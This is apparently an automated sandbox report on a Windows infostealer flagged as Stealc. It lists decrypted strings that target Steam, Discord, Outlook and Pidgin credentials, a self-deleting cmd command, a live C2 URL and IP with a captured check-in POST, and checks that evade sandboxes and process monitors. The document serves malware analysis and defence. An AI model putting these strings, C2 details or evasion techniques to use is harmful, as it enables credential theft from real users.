                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: token:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: done
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: https
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: build
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: token
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: file
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: message
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00AD9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00AC72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00ACA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00ACA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00ACC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00AD40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00ACE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ACF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00AD47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AC1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00ACDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00AD3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AD4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00ACEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00ACBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00ACDF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49707 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 38 36 43 34 37 43 46 30 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="hwid"E586C47CF003204970075------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="build"tale------GCBGCAFIIECBFIDHIJKF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00AC62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 38 36 43 34 37 43 46 30 30 33 32 30 34 39 37 30 30 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="hwid"E586C47CF003204970075------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="build"tale------GCBGCAFIIECBFIDHIJKF--
                Source: file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/-
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpK
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpR
                Source: file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpt;
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phptop
                Source: file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/:
                Source: file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.2067
                Source: file.exe, file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B000980_2_00B00098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB903E0_2_00DB903E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1B1980_2_00B1B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF21380_2_00AF2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B042880_2_00B04288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8925F0_2_00F8925F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2E2580_2_00B2E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3D39E0_2_00B3D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E323840_2_00E32384
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4B3080_2_00B4B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF54EA0_2_00FF54EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B045A80_2_00B045A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2D5A80_2_00B2D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F165BC0_2_00F165BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE45730_2_00AE4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEE5440_2_00AEE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F125030_2_00F12503
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B496FD0_2_00B496FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B066C80_2_00B066C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3A6480_2_00B3A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B367990_2_00B36799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7379D0_2_00E7379D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1D7200_2_00B1D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC875A0_2_00FC875A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B198B80_2_00B198B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1B8A80_2_00B1B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0B8A70_2_00F0B8A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2F8D60_2_00B2F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B148680_2_00B14868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7597A0_2_00E7597A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F05A650_2_00F05A65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29BED0_2_00E29BED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B34BA80_2_00B34BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B30B880_2_00B30B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B28BD90_2_00B28BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3AC280_2_00B3AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B15DB90_2_00B15DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F09D840_2_00F09D84
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B14DC80_2_00B14DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2AD380_2_00B2AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF1D780_2_00AF1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1BD680_2_00B1BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF8D1B0_2_00EF8D1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B31EE80_2_00B31EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B08E780_2_00B08E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F13F7E0_2_00F13F7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0EF4D0_2_00F0EF4D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00AC4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: lvyqwrnu ZLIB complexity 0.994952444617844
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00AD9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00AD3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ZU9X5LDR.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 42%
                Source: file.exeVirustotal: Detection: 39%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2120192 > 1048576
                Source: file.exeStatic PE information: Raw size of lvyqwrnu is bigger than: 0x100000 < 0x19a800
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ac0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lvyqwrnu:EW;fslmoltp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lvyqwrnu:EW;fslmoltp:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AD9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x206242 should be: 0x207dcb
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: lvyqwrnu
                Source: file.exeStatic PE information: section name: fslmoltp
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9A0FD push 430B1D4Dh; mov dword ptr [esp], eax0_2_00F9A13C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F930D2 push ebx; mov dword ptr [esp], 77EF66AAh0_2_00F93101
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F930D2 push eax; mov dword ptr [esp], ecx0_2_00F93133
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEA0DC push eax; retf 0_2_00AEA0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1A088 push edi; mov dword ptr [esp], ecx0_2_00F1A092
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF1B1 push edi; mov dword ptr [esp], 7DDB2EBAh0_2_011DF1B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF1B1 push edi; mov dword ptr [esp], esp0_2_011DF1D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF1B1 push ecx; mov dword ptr [esp], 3EE3BC00h0_2_011DF1EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF1B1 push ebp; mov dword ptr [esp], 7D546CE6h0_2_011DF1F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF1B1 push 25FFF974h; mov dword ptr [esp], ebx0_2_011DF29C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB903E push eax; mov dword ptr [esp], 7E7FE57Bh0_2_00DB90D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB903E push eax; mov dword ptr [esp], ebx0_2_00DB91D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB903E push 3DC986D7h; mov dword ptr [esp], ebp0_2_00DB920F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB903E push 5D47B637h; mov dword ptr [esp], ebx0_2_00DB9238
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB903E push 10A4E901h; mov dword ptr [esp], ecx0_2_00DB9247
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB903E push 76DC3F79h; mov dword ptr [esp], ebx0_2_00DB924F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD3011 push 7F94E394h; mov dword ptr [esp], edx0_2_00FD30CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41015 push 7F8AE59Bh; mov dword ptr [esp], edx0_2_00E4107E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41015 push ecx; mov dword ptr [esp], 2F34C706h0_2_00E410D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCC1F2 push edx; mov dword ptr [esp], eax0_2_00FCC1C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F931E5 push 29963156h; mov dword ptr [esp], ecx0_2_00F93238
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F931E5 push eax; mov dword ptr [esp], edx0_2_00F93260
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F931E5 push 4AD1E000h; mov dword ptr [esp], edi0_2_00F932D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F931E5 push eax; mov dword ptr [esp], esp0_2_00F932DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9A1C0 push 518B78C9h; mov dword ptr [esp], ecx0_2_00F9A1CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB71BC push ecx; mov dword ptr [esp], eax0_2_00FB71D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF045 push esi; mov dword ptr [esp], ebp0_2_011DF059
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF045 push 2FD8319Fh; mov dword ptr [esp], esi0_2_011DF07E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF045 push ecx; mov dword ptr [esp], 7FF37348h0_2_011DF0F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF045 push ebx; mov dword ptr [esp], 35DEF368h0_2_011DF105
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DF045 push 1F76B84Eh; mov dword ptr [esp], esi0_2_011DF149
                Source: file.exeStatic PE information: section name: lvyqwrnu entropy: 7.954065080128192

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AD9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37770
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
